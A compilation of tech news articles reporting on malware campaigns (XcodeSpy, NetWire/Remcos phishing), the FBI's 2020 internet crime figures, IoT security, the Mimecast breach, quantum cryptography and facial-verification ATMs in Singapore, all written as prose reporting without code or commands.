Information Technology

Malicious Xcode projects are being used to hijack developer systems and spread custom EggShell backdoors. 

The malware, dubbed XcodeSpy, targets Xcode, an integrated development environment (IDE) used in macOS for developing Apple software and applications.According to research published by SentinelLabs on Thursday, the Run Script feature in the IDE is being exploited in targeted attacks against iOS developers by way of Trojanized Xcode projects freely shared online.  Legitimate, open source Xcode projects can be found on GitHub. However, in this case, XcodeSpy projects are offering “advanced features” for animating iOS tab bars — and once the initial build is downloaded and launched, a malicious script is deployed to install the EggShell backdoor.  The malicious project explored by the researchers is a ripped version of TabBarInteraction, a legitimate project that has not been compromised.  The Run script of the IDE has been quietly tampered with to connect an attacker’s command-and-control (C2) server to a developer’s project. In particular, Apple’s IDE functionality that allows custom shell scripts to deploy on launching an instance of an app is the subject of abuse.  The C2 is then contacted by the script to pull and download a custom variant of the EggShell backdoor, which installs a user LaunchAgent for persistence.

Two variants of EggShell have been detected — and one of which shares an encrypted string with XcodeSpy.  The backdoor is able to hijack the victim developer’s microphone, camera, and keyboard, as well as grab and send files to the attacker’s C2. SentinelLabs says that at least one US organization has been caught up in attacks of this nature and developers in Asia may have also succumbed to the campaign, which was in operation at least between July and October last year.  Samples of the backdoors were uploaded to VirusTotal on August 5 and October 13. XcodeSpy was first uploaded on September 4, however, the researchers suspect the attacker may have uploaded the sample themselves in order to test detection rates.  “While XcodeSpy appears to be directly targeted at the developers themselves rather than developers’ products or clients, it’s a short step from backdooring a developer’s working environment to delivering malware to users of that developer’s software,” the researchers say. “Consequently, all Apple developers are cautioned to check for the presence of malicious Run scripts whenever adopting third-party Xcode projects.”  Back in August, Trend Micro tracked XCSSET malware in Xcode projects, thought to have been spread to compromise Safari browser sessions for phishing, cross-site scripting (XSS) attacks, and the theft of developer data.  The team said the discovery ultimately led to a “rabbit hole of malicious payloads.” Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Researchers have analyzed an active campaign targeting US taxpayers in order to spread both NetWire and Remcos Trojans. 

The tax season is now upon us and as US residents file their returns ahead of a deadline in April, this is also a prime time for cybercriminals to launch campaigns tailored to take advantage of the annual requirement. Phishing campaigns, unless they are nothing more than mass spray-and-pray attempts, will usually hook on a particular theme or situation to try and elicit enough of a reaction to fool a victim into clicking a malicious link or downloading a malware-laden attachment.  Examples include a ‘fraud’ alert from a bank, demands for student loan repayments, fake criminal investigations by the IRS, or notices from legitimate companies such as PayPal warning of unauthorized transactions.  When it comes to tax season, personal finance-themed phishing emails often include tax return-related content, and this is the hook that the active campaign’s operators have chosen to use.  According to research published by Cybereason on Thursday, the phishing messages come with documents attached that utilize malicious macros to deploy both NetWire and Remcos Remote Access Trojans (RATs).  Phishing document samples revealed that once opened, the content will blur and victims are asked to enable macros and editing in order to view the text. If they accept, a “heavily obfuscated” macro drops a malicious .DLL payload — a dropper for one of the two Trojans — in the /temp directory. 

The .DLL is then injected into Notepad software and the infection chain continues with the decryption of payload data via an XOR key in order to free up executable code. A connection to a command-and-control (C2) server is established and the OpenVPN client is downloaded, together with a side-loaded trojanized .DLL to maintain remote persistence.  This side-loaded .DLL is responsible for unpacking another .DLL, loaded into memory, and injecting it into Notepad. Another package is then pulled from the legitimate image hosting service imgur, and this package — hidden within an image file in a technique known as steganography — is one of either of the Trojans.  Remcos and NetWire RAT functionality includes taking screenshots, keylogging, stealing browser logs and clipboard data, file harvesting, the theft of OS information, and the ability to download and execute additional malware.  The RATs are both commercially available in underground forums and are offered on a cheap Malware-as-a-Service (MaaS) subscription basis, available for as little as $10 per subscription — which keeps the potential criminal customer base of the Trojan variants large.  “The use of various techniques such as steganography, storing payloads on legitimate cloud-based services, and exploiting DLL sideloading against a legitimate software makes these campaigns very difficult to detect,” commented Assaf Dahan, Cybereason head of threat research. “The sensitive information collected from the victims can be sold in the underground communities and used to carry out all manner of identity theft and financial fraud.” Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Americans lost over $4.2 billion to cybercriminals and scammers in 2020, according to FBI figures based on complaints it received.  Over the year, the FBI’s Internet Crime Center (IC3) received 791,790 complaints of suspected internet crime, or about 300,000 more than it did in 2019 when the agency recorded estimated losses at more than $3.5 billion. 

More on privacy

“In 2020, while the American public was focused on protecting our families from a global pandemic and helping others in need, cyber criminals took advantage of an opportunity to profit from our dependence on technology to go on an Internet crime spree,” the FBI says in its Internet Crime Report 2020.  SEE: Network security policy (TechRepublic Premium) Once again, business email compromise (BEC) or email account compromise (EAC) were by far the biggest sources of reported losses, totaling $1.8 billion across 19,369 complaints. That’s up slightly from $1.77 billion in reported losses from 23,775 BEC complaints in 2019. Last year saw a steep rise in BEC complaints stemming from identity theft and funds being converted into cryptocurrency.  The identity theft frequently occurred after a victim provided a form of ID to a tech support scammer or romance scammers. The stolen ID would be used to set up a bank account to receive stolen BEC funds and convert those to a less traceable cryptocurrency, according to IC3. 

The technique and switch to cryptocurrency differs from previous years when a senior executive’s email address may have been spoofed and used to instruct a subordinate to wire funds to the fraudster’s bank account.  The FBI report notes that tech support fraud continues to be a growing problem, but recently victims have complained about criminals posing as customer support for banks, utility companies or virtual currency exchanges.  While the pandemic caused a brief lull in this type of fraud, losses in this category grew to $146 million, or 171% more than losses from 2019. IC3 received 15,421 complaints from victims in 60 countries.  Ransomware is the other threat that won’t go away. The IC3 received 2,474 complaints and reported losses of $29.1 million. The report, however, notes that this is an underestimate as it doesn’t account for does victim reports made directly to FBI field offices and agents.   “The FBI does not encourage paying a ransom to criminal actors. Paying a ransom may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Paying the ransom also does not guarantee that a victim’s files will be recovered,” the FBI stresses in the report.  SEE: Phishing: These are the most common techniques used to attack your PC The most common type of internet crime type reported to IC3 was phishing (including vishing, smishing, and pharming), with 241,342 complaints. This was more than twice the number of phishing complaints IC3 received in 2019.     Notable rises in reported losses from specific crime types when comparing years (2019 versus 2020) included: confident fraud/romance ($475 million versus $600 million); corporate data breach ($53 million versus $129 million); investment fraud ($222 million versus $336 million); personal data breach ($120 million versus $194 million); ransomware ($8.8 million versus $29 million); and tech support ($54 million versus $146 million).  More

Insecure Internet of Things (IoT) devices are potentially putting society as a whole at risk from cyberattacks because cyber criminals are able to exploit these common products that haven’t been designed with any form of security in mind. IoT products have become a staple in many homes and places of work because they’re perceived as helpful to everyday life.

Internet of Things

However, many IoT devices get installed onto networks without proper security procedures in place, either because the user isn’t aware of how to boost the security of the device – for example, by changing the password – or the device doesn’t come with a password or options for securing it at all.In some cases, IoT devices are leaking data onto the internet because the vendor hasn’t properly configured security – whether by mistake, or because of a requirement to rush it out to the market without adding security by design. Either way, poor security in IoT devices can have major consequences.SEE: Sensor’d enterprise: IoT, ML, and big data (ZDNet special report) | Download the report as a PDF (TechRepublic)”It’s not even just the damage that it can cause to you from the exposure of your personal data; it’s the damage it can cause to really our whole society,” Craig Young, principal security researcher at Tripwire, told the ZDNet Security Update video series.”When you look back at IoT botnets nets – Mirai, for example – they’ve demonstrated that if you pull together all of these devices, you have some substantial resources”.

Mirai caused major issues in 2016 when IoT devices infected with malware were roped into a botnet targeting online infrastructure provider Dyn with a massive DDoS attack, knocking a number of major services offline.Each individual IoT device only has a small amount of computing power, but an army of millions of devices all directing traffic towards a single target is a powerful tool for online disruption. And with so many IoT devices available and easy to find on the internet, it’s something that cyber criminals are looking to exploit.”What I do worry about is when you’ve got products that are little computers that are pulling down firmware updates from some company that can get hacked and have that firmware replaced with malware. That’s the doomsday scenario,” said Young.”There’s a lot of reason to believe that vendors really don’t take that infrastructure seriously they’re rushing out the door with features and not taking the time to lay the groundwork for security,” he added.SEE: Phishing: These are the most common techniques used to attack your PCAnd while there are initiatives designed at improving Internet of Things security, and information security researchers are attempting to find and disclose problems so they can be repaired, for now it remains an issue as insecure IoT devices are so readily available.”There are so many different companies in the IoT space and there are not enough security researchers going out of their way to work with them and fix these things,” said Young.Users can try to help ensure the IoT devices they install on their network are secure by, when possible, buying products by vendors that are known and trustworthy, rather than a cheap product from a vendor you’ve never heard of before. Users should also ensure that, when possible, the device isn’t secured with a default password. MORE ON CYBERSECURITY More

Special feature

Cyberwar and the Future of Cybersecurity

Today’s security threats have expanded in scope and seriousness. There can now be millions — or even billions — of dollars at risk when information security isn’t handled properly.

Read More

Intel and DARPA outlined a three-year partnership to develop and manufacture Application Specific Integrated Circuit (ASIC) processors as nations scramble to make secure semiconductors domestically. DARPA (U.S. Defense Advanced Research Projects Agency) and Intel said they will design custom chips that have security countermeasure technologies. The partnership is called Structured Array Hardware for Automatically Realized Applications (SAHARA).With cybersecurity and nation-state threats becoming common issues, countries are looking to put more manufacturing within their borders and secure the supply chain. Intel is the only advanced semiconductor manufacturer in the US. Under the partnership, Intel will supply its Intel eASIC structured ASIC technology with enhanced security. Defense and commercial electronics developers can then develop and deploy the processors. The chips are based on Intel’s 10nm semiconductor process. As for security, Intel will partner with the University of Florida, Texas A&M and University of Maryland to develop security countermeasure technologies. The aim is to bolster the protect data and intellectual property against reverse engineering and counterfeiting. The universities will test the security of the processors. Last week, Intel and Microsoft said they have signed a deal to better secure data in cloud and virtual environments. More

Mimecast has revealed the theft of its source code in a cyberattack linked to the SolarWinds breach. 

According to Mimecast’s security incident disclosure, published on March 16, a malicious SolarWinds Orion update was used to access the company’s production grid environment. The cloud and email security firm said “a limited number of source code repositories” were downloaded during a cyberattack in January, but added that the company currently has “no evidence” that this code was maliciously modified or that the loss will impact any existing products. “We have no evidence that the threat actor accessed email or archive content held by us on behalf of our customers,” Mimecast says. “We believe that the source code downloaded by the threat actor was incomplete and would be insufficient to build and run any aspect of the Mimecast service.”Alongside the source code theft, some Mimecast-issued certificates and limited customer server connection datasets were compromised by attackers. Mimecast was made aware of a certificate security issue by Microsoft in January, which told the company a certificate used to authenticate Mimecast Sync and Recover, Continuity Monitor, and IEP was being exploited to target a small number of M365 tenants from non-Mimecast IP addresses.  A new certificate connection was issued before Microsoft disabled the hijacked certificate on Mimecast’s request. 

In addition, the unidentified threat actors were able to access email addresses, contact information, and credentials, but the latter was encrypted or hashed/salted.  The SolarWinds supply chain attack, first disclosed in December, has impacted thousands of enterprise and government organizations. Software vendor SolarWinds was breached and an update for its Orion software was infected with malware before being pushed to countless users — immediately creating a widespread supply chain-based chain of compromise.  Mimecast and FireEye’s Mandiant team have been working together on an investigation of the security breach. According to the companies, the initial intrusion was made through Sunburst malware loaded alongside the malicious Orion update. Mimecast recommends that customers in the US and UK reset any server connection credentials used on the Mimecast platform as a “precautionary measure.”  The cloud security firm says that hashed credentials are also being reset, and customers involved in the breach have been notified. Mimecast has also upgraded its encryption algorithm for stored credentials and has pulled SolarWinds Orion from its infrastructure. All impacted servers have been replaced. Microsoft estimates that the attack, suspected of being the handiwork of Russian state-sponsored group Nobelium, may have required the efforts of up to 1,000 engineers to create.  Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Quantum computing is ready for mainstream deployment, where it already is being tapped to resolve real-world business challenges. Use of the technology to crack cryptography and encryption codes, however, still has some ways to go.In particular, D-Wave Systems CEO Alan Baratz believes it can take at least another decade before factoring will be viable on quantum computing systems and used to undermine current cryptographic tools. And this was likely the case whether the gate-based system, along with its volatile error correction, or D-Wave’s annealing technology was tapped to factor the large code volumes used in cryptography tools, Baratz said in a video call with ZDNet. That said, D-Wave had an internal security team that monitored activities on its systems, he revealed, whilst acknowledging that it was still too soon to determine the types of hacking tools that could or had been created on quantum computers.

The Canadian quantum computing vendor does not specifically focus on cryptography, but its technology has been used to power intrusion and threat detection applications. It also has presence in the US, UK, and Japan, where it has 20 paying customers in the Asian market. Its cloud-based Leap quantum computing application is available in Singapore via Amazon Web Services (AWS). A Deloitte Consulting report echoed Baratz’s views, stating that quantum computers would not be breaking cryptography or run at computational speeds sufficient to do so anytime soon. However, it said quantum systems could pose a real threat in the long term and it was critical that preparations were carried out now to plan for such a future. On its impact on Bitcoin and blockchain, for instance, the consulting firm estimated that 25% of Bitcoins in circulation were vulnerable to a quantum attack, pointing in particular to the cryptocurrency that currently were stored in P2PK (Pay to Public Key) and reused P2PKH (Pay to Public Key Hash) addresses. These potentially were at risk of attacks as their public keys could be directly obtained from the address or were made public when the Bitcoins were used. 

Deloitte suggested a way to plug such gaps was post-quantum cryptography, though, these algorithms could pose other challenges to the usability of blockchains. Adding that this new form of cryptography currently was assessed by experts, it said: “We anticipate that future research into post-quantum cryptography will eventually bring the necessary change to build robust and future-proof blockchain applications.” Mathematician Peter Shor in 1994 published a quantum formula that he said could break most common algorithms of asymmetric cryptography. It suggested that, given a large enough quantum computing system, the algorithm could be used to identify a private key that matched its corresponding public key to impersonate digital signatures. A team of engineers and researchers in Singapore last year also announced plans to tap quantum cryptography technology to enhance network encryption tools, so these could be ready to mitigate security risks when quantum computing became mainstream. Specifically, they were looking to use “measurement-device-independent” quantum key distribution (MDI QKD) technology and hoped to their research could pave the way to a new class of “quantum-resilient encryptors”.Quantum ready for mainstream enterprise applicationWhile the technology has yet to break cryptography, quantum computing is ready for mainstream adoption and already is tapped to address real-world enterprise challenges. Pointing specifically to D-Wave’s proprietary annealing technology, Baratz said this allowed quantum computing to scale more easily and be less sensitive to noise and computational errors, to which gate-based systems were prone. Currently in its fifth generation, D-Wave’s quantum computers clock more than 5,000 qubits and capable of supporting commercial rollout “at commercial scale”, he said. This, he added, was a stage that no other market players had been able to achieve thus far with the gate-based model. Commonly adopted in the industry today, the gate system made quantum computers tough to build and sensitive error. Its most stable state currently generated about 30 qubits, which was sufficient to power mostly research work and unlikely to be used to solve business problems at scale for another seven to 10 years, he said. “Error rates on [gate-based systems] are so high you can’t really do anything with them, even with small problems,” he added, noting that a competitor last year said it was able to solve a specific optimisation problem on its quantum computer. However, this was possible once out of every 100,000 attempts, he said. Quantum computing runs on principles of quantum mechanics that include probabilistic computation.  Baratz said annealing technology, designed specifically for optimisation purposes, had a higher influence on the probability of outcomes and, hence, was less sensitive to errors. It also learnt from where it ended with the previous computation to finetune future ones.”When you lose coherence, you end up with garbage. With annealing, when you lose coherence, you settle into a [potential] solution and restart the computation to try and improve the solution,” he said. Gate-based model, in comparison, could not do that since it would lose coherence after every computation rather than pick off from the previous run. A grocery using D-Wave to enhance a portion of the customer’s logistics system was able to solve an optimisation problem in two minutes per week per location, where previously it took 25 hours per week per location, he noted. There currently are more than 20,000 developers worldwide that have signed up to access Leap, with some 1,000 regularly using the service each month. Paying customers fork out an estimated $2,000 an hour to run computations on D-Wave computers. Baratz noted, though, that its systems could not solve all quantum computing issues because annealing was designed specifically to solve optimisation problems, which were common challenges for businesses. Gate-based systems, on the other hand, would be able to solve any computation problems once the error rates were reduced — something he said likely would not actualise for at least another seven years.So while D-Wave’s annealing-powered quantum computers were limited to solving optimisation problems, they were capable of solving real-world business challenges today, he said. Its systems also were on a path to building a universal error correction system by leveraging the technology it had, he added. To date, more than 250 applications had been built with D-Wave systems, most of which used Leap and spanned various use cases including financial modelling, scheduling, protein folding, and manufacturing optimisation, the vendor said. RELATED COVERAGE More

OCBC Bank has turned on face verification at selected ATMs across Singapore, letting its customers authenticate their identity without the need for an ATM card. Access, though, currently is limited to balance queries, before other transactions are added to the mix at a later stage. Facial biometrics are available at eight ATMs in the city-state, including at the local bank’s main branches in Tampines, in CBD, and at a convenience store. For now, OCBC customers will only be able to use the authentication option to check their account balance, according to a statement released Thursday. The Singapore bank said access would be expanded to include cash withdrawals “progressively”, but gave no timeline on when this would be. After this was added to the list of services accessible via face verification, it said others would be introduced from next year including cash deposits, funds transfers to other banks, cashcard top-ups, and credit card bill payments. OCBC noted that balance queries and cash withdrawals were the two most used services at its ATMs, accounting for almost 8 in 10 transactions carried out at these machines in Singapore. 

The feature is powered by the government’s SingPass Face Verification system, where an individual’s scanned face is verified against the national biometric database comprising images and identifies of more than 4 million local residents. The technology is embedded with security features that the Singapore government says safeguard against fraud, such as liveness detection capabilities to detect and block the use of photographs, videos, or masks during the verification process.The option to verify a customer’s identity through facial biometrics also bypassed the need for ATM cards, which could be skimmed or stolen, OCBC said. Customers keen to use the feature would be prompted to enter their identification number before positioning their face within a frame on the screen. The eight selected ATMs were armed with pre-installed web-enabled camera that would take a scan of the customer’s face and verify it in real-time against the national database, to which OCBC’s ATM was digital linked. Once verified, the customer would be allowed to proceed with their transaction. 

Noting that consumers here, including the elderly, were avid digital adopters, the bank’s Singapore head of consumer financial services Sunny Quek said: “While cash is still a key mode of payment in Singapore, the digital overlay to get cash is very welcomed by consumers.”He noted that digital adoption within OCBC had grown more than 40% last year, with more customers signed up on the country’s digital e-payment system PayNow, and PayNow transactions doubling, compared to 2019. QR code cash withdrawals at the bank’s ATMs, launched in July 2019, also grew 88% year-on-year in 2020, Quek said, adding that the introduction of face verification provide another of convenience for customers who accessed the bank’s touchpoints.According to OCBC, ATM use remained high amongst its customers even amidst high adoption of digital banking services, at more than 2 million cash withdrawals a month. It noted that more than 200,000 customers made their first digital banking transactions last year. Its mobile banking app also clocks more than 7 million logins each month via face or fingerprint biometric authentication. Since including SingPass as a login option for its customers last July, OCBC said more than 1 million logins on its digital banking platforms were carried out using the e-government system, instead of access codes and PINs.RELATED COVERAGE More